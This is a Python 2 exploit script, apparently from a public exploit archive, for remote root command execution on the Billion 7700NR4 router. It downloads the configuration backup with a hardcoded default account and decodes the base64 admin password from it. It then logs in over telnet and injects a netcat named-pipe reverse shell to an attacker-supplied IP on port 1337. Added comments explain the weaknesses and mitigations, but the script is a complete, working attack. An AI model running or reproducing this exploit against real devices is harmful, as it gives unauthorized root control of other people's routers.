# Title : Billion Router 7700NR4 Remote Root Command Execution
# Date : 06/10/2016
# Author : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor : http://www.billion.com/
# Vulnerability Description:
# This router is widely used here in Albania. It is given by a telecom provider to home and business users.
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
# credentials we don't have much access, but due to the lack of authentication security we can download the backup and get the admin password.
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
# You must change host with the target and reverse_ip with your attacking ip.
# Fix:
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
#
import requests
import base64
import socket
import time
host = ""  # target router address; left empty here and must be filled in by hand (see header)
def_user = "user"  # factory default account described in the header comment
def_pass = "user"  # NOTE(review): the root cause is that this default cannot be changed by the user
reverse_ip = ""  # listener address for the callback; also left empty and filled in by hand

# Banner
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner  # Python 2 print statement; this file does not run unchanged under Python 3

# limited shell escape
# The command string is assembled once at import time from reverse_ip, so an
# empty reverse_ip is silently baked in; nothing below validates host or reverse_ip.
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
def execute_payload(password):
    """Log in to the router's telnet service and send the prepared command string.

    Uses the module-level ``host`` and ``evil``. The login is the fixed
    username "admin" with ``password`` (the value the caller recovered from
    the backup file). Each step is separated by a one-second sleep and every
    response is read once and discarded, so there is no check that the login
    actually succeeded before the command is sent.

    Mitigation on the device side: disable the telnet service, or at least
    require credentials that cannot be recovered from the backup download.
    """
    print "[+] Please run nc -lvp 1337 and then press any key [+]"
    raw_input()  # blocks until Enter; Python 2 only (input() in Python 3)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,23))  # no timeout is set, so a silently dropped SYN waits for the OS connect timeout
    s.recv(1024)  # consume the login prompt
    s.send("admin\r")
    a= s.recv(1024)  # password prompt; the value is never used
    time.sleep(1)
    s.send(password +"\r")
    time.sleep(1)
    s.recv(1024)  # post-login output, discarded without looking for a failure message
    s.send(evil + "\r")
    time.sleep(1)
    print "[+] If everything worked you should get a reverse shell [+]"
    print "[+] Warning pressing any key will close the SHELL [+]"
    raw_input()
    # NOTE(review): the socket is never closed explicitly; it is left to
    # interpreter cleanup when ``s`` goes out of scope.
# Step 1: fetch the configuration backup with the default low-privilege account.
# NOTE(review): the weakness here is that this endpoint answers to a fixed
# default credential and returns the admin password in reversible (base64) form,
# over plain HTTP. Restricting the backup download to an authenticated admin
# session and not storing secrets reversibly would close this path.
r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
if(r.status_code == 200):
    print "[+] Seems the exploit worked [+]"
    print "[+] Dumping data . . . [+]"
    temp = r.text
    # Take the text between the <AdminPassword> tags; this raises IndexError
    # if the tag is absent (e.g. a 200 response that is not the expected backup).
    admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
    # print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
    # The stored value is only base64-encoded, not hashed, so it decodes
    # straight to the admin password handed to the telnet step.
    execute_payload(str(base64.b64decode(admin_pass)))
else:
    print "[-] Exploit Failed [-]"  # any non-200 status (presumably 401 once the default credentials have been changed)
print "\n[+] https://www.infogen.al/ [+]\n\n"